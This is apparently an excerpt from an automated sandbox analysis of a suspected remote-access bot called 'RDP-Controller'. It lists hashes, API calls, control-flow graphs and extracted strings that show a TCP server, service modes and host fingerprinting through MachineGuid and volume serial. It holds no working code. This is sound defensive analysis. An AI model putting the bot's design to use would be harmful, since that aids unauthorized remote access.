                                                                    • String ID: RDP-Controller$[E] (%s) -> No a valid run mode(mode=%s)$[E] (%s) -> StartServiceCtrlDispatcherA failed(GetLastError=%lu)$main$service$standalone
                                                                    • API String ID: 3617873859-308889057
                                                                    • Opcode ID: 42f86d31ba7867ce5e87f8c186e311e3b151731fd0be31e8263105fe58cfcc7b
                                                                    • Instruction ID: 566ec606ec4bf29c913d67d9510554f19f9191332e4f9ae9e7e1a50e4afa8f42
                                                                    • Opcode Fuzzy Hash: 42f86d31ba7867ce5e87f8c186e311e3b151731fd0be31e8263105fe58cfcc7b
                                                                    • Instruction Fuzzy Hash: 6E51F710F0D643A5FB6097DDA4903797390AF18344F141632F74ECA2B2EE6EE9998792
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
                                                                    • String ID:
                                                                    • API String ID: 3714283218-0
                                                                    • Opcode ID: 423c7fadebe407afcbf8f11926be5113ac1f50ee7c1d89c8a253cd586a538a4a
                                                                    • Instruction ID: 7b2eb3eb57e341484f5901f808c8b73554aadc4c30c049422223eea9475618f6
                                                                    • Opcode Fuzzy Hash: 423c7fadebe407afcbf8f11926be5113ac1f50ee7c1d89c8a253cd586a538a4a
                                                                    • Instruction Fuzzy Hash: 93511722E09A4695FB529BA9E85127933A0BF48B99F144735EB0DCB3B5DE3CF4409380
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastrecv
                                                                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                                    • API String ID: 2514157807-65069805
                                                                    • Opcode ID: cb83abf59dcf32c5503ea29b65ae6c5fbd71d82c662421a75d19843cd04b64a0
                                                                    • Instruction ID: cbae33de8d995b60b1cfc85d3e752cc0a42534c24a4539ffcac5814cd261a32d
                                                                    • Opcode Fuzzy Hash: cb83abf59dcf32c5503ea29b65ae6c5fbd71d82c662421a75d19843cd04b64a0
                                                                    • Instruction Fuzzy Hash: 44115E60E0C51792F6205729AD402B913516F45BF4F919333DCFD9AAF7EEACA946C300

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 7ff6bfd62515-7ff6bfd62531 1 7ff6bfd625c7-7ff6bfd625f5 call 7ff6bfd699e2 0->1 2 7ff6bfd62537-7ff6bfd6253a 0->2 10 7ff6bfd62722-7ff6bfd62733 1->10 4 7ff6bfd625fa-7ff6bfd62628 call 7ff6bfd699e2 2->4 5 7ff6bfd62540-7ff6bfd62544 2->5 4->10 8 7ff6bfd62546-7ff6bfd6254a 5->8 9 7ff6bfd62550-7ff6bfd62565 fopen 5->9 8->9 12 7ff6bfd6262d-7ff6bfd6265b call 7ff6bfd699e2 8->12 13 7ff6bfd6256b-7ff6bfd62580 fseek 9->13 14 7ff6bfd62660-7ff6bfd62689 _errno call 7ff6bfd699e2 _errno 9->14 19 7ff6bfd6273c-7ff6bfd62749 10->19 20 7ff6bfd62735 10->20 12->10 17 7ff6bfd62586-7ff6bfd625af _errno call 7ff6bfd699e2 _errno 13->17 18 7ff6bfd62778-7ff6bfd62785 call 7ff6bfd6e478 13->18 28 7ff6bfd6268b-7ff6bfd62698 14->28 29 7ff6bfd626c0-7ff6bfd626d4 _errno 14->29 35 7ff6bfd626f9-7ff6bfd62707 _errno 17->35 36 7ff6bfd625b5-7ff6bfd625c2 17->36 33 7ff6bfd62787 18->33 34 7ff6bfd627b0-7ff6bfd627d9 _errno call 7ff6bfd699e2 _errno 18->34 25 7ff6bfd62abb 19->25 26 7ff6bfd6274f-7ff6bfd62760 call 7ff6bfd699e2 19->26 20->19 38 7ff6bfd62ac7-7ff6bfd62ae0 call 7ff6bfd699e2 25->38 32 7ff6bfd62765-7ff6bfd62777 26->32 28->29 37 7ff6bfd6270d-7ff6bfd62710 29->37 40 7ff6bfd62a9d-7ff6bfd62aa2 33->40 41 7ff6bfd6278d-7ff6bfd62792 33->41 50 7ff6bfd627db-7ff6bfd627e8 34->50 51 7ff6bfd6281f-7ff6bfd62833 _errno 34->51 35->37 36->1 43 7ff6bfd6271a-7ff6bfd6271c 37->43 44 7ff6bfd62712-7ff6bfd62715 fclose 37->44 38->32 40->37 46 7ff6bfd62838-7ff6bfd62850 fseek 41->46 47 7ff6bfd62798-7ff6bfd6279d 41->47 43->10 43->38 44->43 52 7ff6bfd6287a-7ff6bfd628a3 _errno call 7ff6bfd699e2 _errno 46->52 53 7ff6bfd62852-7ff6bfd6285e 46->53 47->46 49 7ff6bfd627a3-7ff6bfd627ab 47->49 49->37 50->51 51->37 62 7ff6bfd628e9-7ff6bfd628fd _errno 52->62 63 7ff6bfd628a5-7ff6bfd628b2 52->63 55 7ff6bfd62902-7ff6bfd62924 GetProcessHeap HeapAlloc 53->55 56 7ff6bfd62864-7ff6bfd6286a 53->56 55->56 60 7ff6bfd6292a-7ff6bfd62940 call 7ff6bfd699e2 55->60 57 7ff6bfd62ab1-7ff6bfd62ab6 56->57 58 7ff6bfd62870-7ff6bfd62875 56->58 57->37 61 7ff6bfd629b9-7ff6bfd629c8 58->61 60->56 65 7ff6bfd629ca-7ff6bfd629cc 61->65 66 7ff6bfd62a05-7ff6bfd62a0e 61->66 62->37 63->62 65->66 70 7ff6bfd629ce-7ff6bfd629f1 fread 65->70 68 7ff6bfd62a3d-7ff6bfd62a60 call 7ff6bfd699e2 66->68 69 7ff6bfd62a10-7ff6bfd62a12 66->69 72 7ff6bfd62a14-7ff6bfd62a19 68->72 71 7ff6bfd62a62-7ff6bfd62a67 69->71 69->72 70->66 74 7ff6bfd629f3 70->74 77 7ff6bfd62a69-7ff6bfd62a6f 71->77 78 7ff6bfd62a74-7ff6bfd62a7d 71->78 72->37 75 7ff6bfd62a1f-7ff6bfd62a38 GetProcessHeap HeapFree 72->75 79 7ff6bfd629f9-7ff6bfd629fc 74->79 80 7ff6bfd62945-7ff6bfd6296e _errno call 7ff6bfd699e2 _errno 74->80 75->37 77->37 78->77 79->61 83 7ff6bfd629a5-7ff6bfd629b3 _errno 80->83 84 7ff6bfd62970-7ff6bfd6297d 80->84 83->61 84->83
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$fclosefflushfopenfseekfwrite
                                                                    • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
                                                                    • API String ID: 2897271634-4162578512
                                                                    • Opcode ID: 22b100c5830f6336c3720d7b497c3ec90ad88d6a61efeae168927c580a299fcb
                                                                    • Instruction ID: b1cb6c801ad56ebd4f74222ba44cbefe229961d36321911a481ec82ef28d4bf9
                                                                    • Opcode Fuzzy Hash: 22b100c5830f6336c3720d7b497c3ec90ad88d6a61efeae168927c580a299fcb
                                                                    • Instruction Fuzzy Hash: 17D16C61A09A03A1EA209B9DE8447B93351BF55786F554732EB0ECB6F0DF3CE546C380

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 85 7ffe13306941-7ffe13306964 InitializeCriticalSectionAndSpinCount 86 7ffe13306aec-7ffe13306b0d GetLastError call 7ffe1330a202 85->86 87 7ffe1330696a-7ffe13306991 InitializeCriticalSectionAndSpinCount 85->87 97 7ffe13306b27-7ffe13306b2d 86->97 98 7ffe13306b0f 86->98 88 7ffe13306c08-7ffe13306c29 GetLastError call 7ffe1330a202 87->88 89 7ffe13306997-7ffe133069a7 87->89 107 7ffe13306c2b 88->107 108 7ffe13306c43-7ffe13306c49 88->108 91 7ffe133069ad-7ffe133069e5 CreateThread 89->91 92 7ffe13306fda-7ffe13306ff2 call 7ffe1330a202 89->92 95 7ffe133069eb-7ffe13306a07 call 7ffe1330a202 91->95 96 7ffe13306ce0-7ffe13306d01 GetLastError call 7ffe1330a202 91->96 106 7ffe13306ff7-7ffe13306ffe 92->106 95->92 118 7ffe13306a0d-7ffe13306a45 CreateThread 95->118 122 7ffe13306d17-7ffe13306d1d 96->122 123 7ffe13306d03 96->123 104 7ffe13306bcc 97->104 105 7ffe13306b33-7ffe13306b39 97->105 102 7ffe13306bb8 98->102 103 7ffe13306b15-7ffe13306b22 98->103 102->104 103->97 121 7ffe13306bd6 104->121 111 7ffe13306b3b-7ffe13306b41 105->111 112 7ffe13306b65-7ffe13306b68 105->112 113 7ffe13306fd5 107->113 114 7ffe13306c31-7ffe13306c3e 107->114 116 7ffe13306fff-7ffe13307004 108->116 117 7ffe13306c4f-7ffe13306c55 108->117 119 7ffe13306b47-7ffe13306b4d 111->119 120 7ffe13306bf4 111->120 126 7ffe13306b6a-7ffe13306b6d 112->126 127 7ffe13306b7e-7ffe13306b84 112->127 113->92 114->108 116->92 124 7ffe13306c57-7ffe13306c5d 117->124 125 7ffe13306c81-7ffe13306c84 117->125 135 7ffe13306a4b-7ffe13306a67 call 7ffe1330a202 118->135 136 7ffe13306de8-7ffe13306e09 GetLastError call 7ffe1330a202 118->136 137 7ffe13306b53-7ffe13306b59 119->137 138 7ffe13306bfe 119->138 120->138 146 7ffe13306be0 121->146 128 7ffe13306d4d-7ffe13306d5d 122->128 129 7ffe13306d1f 122->129 139 7ffe13306d7a-7ffe13306d8a 123->139 140 7ffe13306d05-7ffe13306d12 123->140 141 7ffe1330701b-7ffe13307020 124->141 142 7ffe13306c63-7ffe13306c69 124->142 131 7ffe13306c86-7ffe13306c89 125->131 132 7ffe13306ca2-7ffe13306ca8 125->132 126->121 130 7ffe13306b6f-7ffe13306b72 126->130 133 7ffe13306bea 127->133 134 7ffe13306b86 127->134 128->92 152 7ffe13306d62-7ffe13306d68 129->152 153 7ffe13306d21-7ffe13306d24 129->153 145 7ffe13306b74 130->145 130->146 147 7ffe13307006-7ffe1330700b 131->147 148 7ffe13306c8f-7ffe13306c92 131->148 149 7ffe13307014-7ffe13307019 132->149 150 7ffe13306cae-7ffe13306cb3 132->150 133->120 155 7ffe13306b90 134->155 135->92 169 7ffe13306a6d-7ffe13306aa5 CreateThread 135->169 167 7ffe13306e0b 136->167 168 7ffe13306e1f-7ffe13306e25 136->168 154 7ffe13306b5b 137->154 137->155 138->88 139->92 140->122 141->92 143 7ffe13307022-7ffe13307027 142->143 144 7ffe13306c6f-7ffe13306c75 142->144 143->92 157 7ffe13306cb8-7ffe13306cbd 144->157 158 7ffe13306c77-7ffe13306c7c 144->158 145->127 146->133 147->92 159 7ffe1330700d-7ffe13307012 148->159 160 7ffe13306c98-7ffe13306c9d 148->160 149->92 150->92 164 7ffe13306d6a-7ffe13306d70 152->164 165 7ffe13306d30-7ffe13306d40 152->165 162 7ffe13306d26-7ffe13306d29 153->162 163 7ffe13306d45-7ffe13306d4b 153->163 154->112 155->102 157->92 158->92 159->92 160->92 170 7ffe13306d2b-7ffe13306d2e 162->170 171 7ffe13306da4-7ffe13306db4 162->171 163->128 163->139 172 7ffe13306d72-7ffe13306d78 164->172 173 7ffe13306d8f-7ffe13306d9f 164->173 165->92 174 7ffe13306e0d-7ffe13306e1a 167->174 175 7ffe13306e82-7ffe13306e92 167->175 176 7ffe13306e27 168->176 177 7ffe13306e55-7ffe13306e65 168->177 178 7ffe13306aab-7ffe13306ac7 call 7ffe1330a202 169->178 179 7ffe13306ee6-7ffe13306f07 GetLastError call 7ffe1330a202 169->179 170->139 170->165 171->92 172->128 172->139 173->92 174->168 175->92 180 7ffe13306e6a-7ffe13306e70 176->180 181 7ffe13306e29-7ffe13306e2c 176->181 177->92 178->92 194 7ffe13306acd-7ffe13306ae2 call 7ffe1330a202 178->194 195 7ffe13306f1d-7ffe13306f23 179->195 196 7ffe13306f09 179->196 186 7ffe13306e38-7ffe13306e48 180->186 187 7ffe13306e72-7ffe13306e78 180->187 184 7ffe13306e4d-7ffe13306e53 181->184 185 7ffe13306e2e-7ffe13306e31 181->185 184->175 184->177 190 7ffe13306eac-7ffe13306ebc 185->190 191 7ffe13306e33-7ffe13306e36 185->191 186->92 192 7ffe13306e7a-7ffe13306e80 187->192 193 7ffe13306e97-7ffe13306ea7 187->193 190->92 191->175 191->186 192->175 192->177 193->92 202 7ffe13306ae7 194->202 200 7ffe13306f7d-7ffe13306f8d 195->200 201 7ffe13306f25 195->201 198 7ffe13306f0b-7ffe13306f18 196->198 199 7ffe13306f3f-7ffe13306f4f 196->199 198->195 199->92 200->92 203 7ffe13306f27-7ffe13306f2d 201->203 204 7ffe13306f54-7ffe13306f57 201->204 202->106 205 7ffe13306f63-7ffe13306f73 203->205 206 7ffe13306f2f-7ffe13306f35 203->206 207 7ffe13306f59-7ffe13306f5c 204->207 208 7ffe13306f75-7ffe13306f7b 204->208 205->92 209 7ffe13306f37-7ffe13306f3d 206->209 210 7ffe13306f8f-7ffe13306f9f 206->210 211 7ffe13306fa1-7ffe13306fb1 207->211 212 7ffe13306f5e-7ffe13306f61 207->212 208->199 208->200 209->199 209->200 210->92 211->92 212->199 212->205
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$CriticalSection$CreateThread$CountInitializeSpin$CopyEnterFileLeavefflushfwrite
                                                                    • String ID: $ $ $ $ $Done$P$P$P$P$P$[E] (%s) -> CreateThread(routine_accept) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_gc) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_tx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_clients) failed(gle=%lu)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_queue) failed(gle=%lu)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$routine_accept$routine_gc$routine_tx$server_init$~$~$~$~$~
                                                                    • API String ID: 3214881788-719614687
                                                                    • Opcode ID: 3b00a8e53fa1ebf14ed1e77d3617b0821da378aa3e394c735acdf32d115a9638
                                                                    • Instruction ID: 537161c5d6a79bc065bc5b3a05efb7e8e6a1c5600923f98dc6da79c90d7a19a6
                                                                    • Opcode Fuzzy Hash: 3b00a8e53fa1ebf14ed1e77d3617b0821da378aa3e394c735acdf32d115a9638
                                                                    • Instruction Fuzzy Hash: F9F10560A0CF0389FB205B06A89437D2251EF35374F2443B2D57E662FADE6DB985A34D

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 213 7ffe11504bc0-7ffe11504bda call 7ffe115044a4 216 7ffe115050f2 213->216 217 7ffe11504be0-7ffe11504bf5 call 7ffe11504423 213->217 220 7ffe11505106-7ffe1150510b 216->220 221 7ffe11504c4b 217->221 222 7ffe11504bf7-7ffe11504c25 217->222 223 7ffe11504c5d-7ffe11504c74 call 7ffe11501292 220->223 224 7ffe11504c50-7ffe11504c5b FreeLibrary 221->224 231 7ffe11504c27-7ffe11504c2c 222->231 232 7ffe11504c2e-7ffe11504c49 call 7ffe11501292 222->232 226 7ffe11504c79-7ffe11504c86 223->226 224->223 228 7ffe11504c87-7ffe11504cc0 GetNativeSystemInfo GetWindowsDirectoryA 224->228 229 7ffe11504cc6-7ffe11504ce7 GetLastError call 7ffe11501292 228->229 230 7ffe11504d9e-7ffe11504dc1 call 7ffe11501292 228->230 239 7ffe11504ce9 229->239 240 7ffe11504d07-7ffe11504d0d 229->240 230->223 241 7ffe11504dc7-7ffe11504dfd call 7ffe1150d6c2 230->241 231->224 232->224 242 7ffe11504cfd-7ffe11504d02 239->242 243 7ffe11504ceb-7ffe11504cf8 239->243 240->220 245 7ffe11504d13-7ffe11504d19 240->245 251 7ffe11504e03-7ffe11504e05 241->251 252 7ffe11504eae-7ffe11504eca call 7ffe11501292 241->252 242->223 243->242 247 7ffe11504d1b-7ffe11504d1e 245->247 248 7ffe11504d52-7ffe11504d58 245->248 253 7ffe11504d3c-7ffe11504d42 247->253 254 7ffe11504d20-7ffe11504d23 247->254 249 7ffe1150512e-7ffe11505133 248->249 250 7ffe11504d5e-7ffe11504d64 248->250 249->223 257 7ffe11504d6a-7ffe11504d70 250->257 258 7ffe11505138-7ffe1150513d 250->258 251->223 260 7ffe11504e0b-7ffe11504e68 GetVolumeInformationA 251->260 265 7ffe11504ecf 252->265 255 7ffe11504d48-7ffe11504d4d 253->255 256 7ffe11505124-7ffe11505129 253->256 261 7ffe11504d29-7ffe11504d2c 254->261 262 7ffe11505110-7ffe11505115 254->262 255->223 256->223 263 7ffe11504d76-7ffe11504d7b 257->263 264 7ffe11505142-7ffe11505147 257->264 258->223 266 7ffe11504f6b-7ffe11504f9d call 7ffe11501292 260->266 267 7ffe11504e6e-7ffe11504e94 GetLastError call 7ffe11501292 260->267 268 7ffe1150511a-7ffe1150511f 261->268 269 7ffe11504d32-7ffe11504d37 261->269 262->223 263->223 264->223 265->251 276 7ffe11504fb1-7ffe11504fb8 266->276 277 7ffe11504f9f-7ffe11504fab strlen 266->277 274 7ffe11504e96 267->274 275 7ffe11504ed4-7ffe11504eda 267->275 268->223 269->223 278 7ffe11504e9c-7ffe11504ea9 274->278 279 7ffe11505023-7ffe11505028 274->279 280 7ffe11505037-7ffe1150503c 275->280 281 7ffe11504ee0 275->281 283 7ffe11504fbc-7ffe11505019 call 7ffe11501292 276->283 277->276 282 7ffe11505073-7ffe11505077 277->282 278->252 279->223 280->223 285 7ffe11504f19-7ffe11504f1f 281->285 286 7ffe11504ee2-7ffe11504ee5 281->286 282->276 284 7ffe1150507d-7ffe11505081 282->284 291 7ffe1150501e 283->291 284->276 288 7ffe11505087-7ffe115050ba _errno strtol _errno 284->288 292 7ffe11504f25-7ffe11504f2b 285->292 293 7ffe1150505f-7ffe11505064 285->293 289 7ffe11504ee7-7ffe11504eea 286->289 290 7ffe11504f03-7ffe11504f09 286->290 296 7ffe115050bc-7ffe115050bf 288->296 297 7ffe115050ca-7ffe115050ed _errno call 7ffe11501292 288->297 298 7ffe11505041-7ffe11505046 289->298 299 7ffe11504ef0-7ffe11504ef3 289->299 300 7ffe11505055-7ffe1150505a 290->300 301 7ffe11504f0f-7ffe11504f14 290->301 291->226 294 7ffe11505069-7ffe1150506e 292->294 295 7ffe11504f31-7ffe11504f37 292->295 293->223 294->223 302 7ffe11504f39-7ffe11504f3e 295->302 303 7ffe11504f43-7ffe11504f48 295->303 296->283 304 7ffe115050c5 296->304 297->276 298->223 306 7ffe1150504b-7ffe11505050 299->306 307 7ffe11504ef9-7ffe11504efe 299->307 300->223 301->223 302->223 303->223 304->276 306->223 307->223
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                                    • API String ID: 3828489143-883582248
                                                                    • Opcode ID: e7e85a61618da36f147663b45e66434ba37cae056eceaab88f60427f3ee203cc
                                                                    • Instruction ID: 985430f3e5b7c289967aa280a9ebf8849399dfda434b78d4aaf4cfbcbe6d2437
                                                                    • Opcode Fuzzy Hash: e7e85a61618da36f147663b45e66434ba37cae056eceaab88f60427f3ee203cc
                                                                    • Instruction Fuzzy Hash: 04D19222E1CE5381FB219797E4543BC67A9AF41778F5840BAC96E472B0DE3CEC848781

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 701 7ffe13302610-7ffe1330262a call 7ffe13307474 704 7ffe13302b42 701->704 705 7ffe13302630-7ffe13302645 call 7ffe133073f3 701->705 707 7ffe13302b56-7ffe13302b5b 704->707 710 7ffe1330269b 705->710 711 7ffe13302647-7ffe13302675 705->711 709 7ffe133026ad-7ffe133026c4 call 7ffe1330a202 707->709 715 7ffe133026c9-7ffe133026d6 709->715 712 7ffe133026a0-7ffe133026ab FreeLibrary 710->712 719 7ffe13302677-7ffe1330267c 711->719 720 7ffe1330267e-7ffe13302699 call 7ffe1330a202 711->720 712->709 714 7ffe133026d7-7ffe13302710 GetNativeSystemInfo GetWindowsDirectoryA 712->714 717 7ffe13302716-7ffe13302737 GetLastError call 7ffe1330a202 714->717 718 7ffe133027ee-7ffe13302811 call 7ffe1330a202 714->718 727 7ffe13302739 717->727 728 7ffe13302757-7ffe1330275d 717->728 718->709 729 7ffe13302817-7ffe1330284d call 7ffe13307e42 718->729 719->712 720->712 730 7ffe1330274d-7ffe13302752 727->730 731 7ffe1330273b-7ffe13302748 727->731 728->707 733 7ffe13302763-7ffe13302769 728->733 739 7ffe13302853-7ffe13302855 729->739 740 7ffe133028fe-7ffe1330291a call 7ffe1330a202 729->740 730->709 731->730 735 7ffe1330276b-7ffe1330276e 733->735 736 7ffe133027a2-7ffe133027a8 733->736 741 7ffe1330278c-7ffe13302792 735->741 742 7ffe13302770-7ffe13302773 735->742 737 7ffe13302b7e-7ffe13302b83 736->737 738 7ffe133027ae-7ffe133027b4 736->738 737->709 747 7ffe133027ba-7ffe133027c0 738->747 748 7ffe13302b88-7ffe13302b8d 738->748 739->709 750 7ffe1330285b-7ffe133028b8 GetVolumeInformationA 739->750 757 7ffe1330291f 740->757 745 7ffe13302798-7ffe1330279d 741->745 746 7ffe13302b74-7ffe13302b79 741->746 743 7ffe13302779-7ffe1330277c 742->743 744 7ffe13302b60-7ffe13302b65 742->744 753 7ffe13302b6a-7ffe13302b6f 743->753 754 7ffe13302782-7ffe13302787 743->754 744->709 745->709 746->709 755 7ffe133027c6-7ffe133027cb 747->755 756 7ffe13302b92-7ffe13302b97 747->756 748->709 751 7ffe133029bb-7ffe133029ed call 7ffe1330a202 750->751 752 7ffe133028be-7ffe133028e4 GetLastError call 7ffe1330a202 750->752 764 7ffe13302a01-7ffe13302a08 751->764 765 7ffe133029ef-7ffe133029fb strlen 751->765 762 7ffe133028e6 752->762 763 7ffe13302924-7ffe1330292a 752->763 753->709 754->709 755->709 756->709 757->739 766 7ffe133028ec-7ffe133028f9 762->766 767 7ffe13302a73-7ffe13302a78 762->767 768 7ffe13302a87-7ffe13302a8c 763->768 769 7ffe13302930 763->769 771 7ffe13302a0c-7ffe13302a69 call 7ffe1330a202 764->771 765->764 770 7ffe13302ac3-7ffe13302ac7 765->770 766->740 767->709 768->709 773 7ffe13302969-7ffe1330296f 769->773 774 7ffe13302932-7ffe13302935 769->774 770->764 772 7ffe13302acd-7ffe13302ad1 770->772 781 7ffe13302a6e 771->781 772->764 778 7ffe13302ad7-7ffe13302b0a _errno call 7ffe1330ecb8 _errno 772->778 776 7ffe13302975-7ffe1330297b 773->776 777 7ffe13302aaf-7ffe13302ab4 773->777 779 7ffe13302937-7ffe1330293a 774->779 780 7ffe13302953-7ffe13302959 774->780 784 7ffe13302ab9-7ffe13302abe 776->784 785 7ffe13302981-7ffe13302987 776->785 777->709 794 7ffe13302b0c-7ffe13302b0f 778->794 795 7ffe13302b1a-7ffe13302b3d _errno call 7ffe1330a202 778->795 787 7ffe13302a91-7ffe13302a96 779->787 788 7ffe13302940-7ffe13302943 779->788 782 7ffe13302aa5-7ffe13302aaa 780->782 783 7ffe1330295f-7ffe13302964 780->783 781->715 782->709 783->709 784->709 789 7ffe13302989-7ffe1330298e 785->789 790 7ffe13302993-7ffe13302998 785->790 787->709 792 7ffe13302a9b-7ffe13302aa0 788->792 793 7ffe13302949-7ffe1330294e 788->793 789->709 790->709 792->709 793->709 794->771 796 7ffe13302b15 794->796 795->764 796->764
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
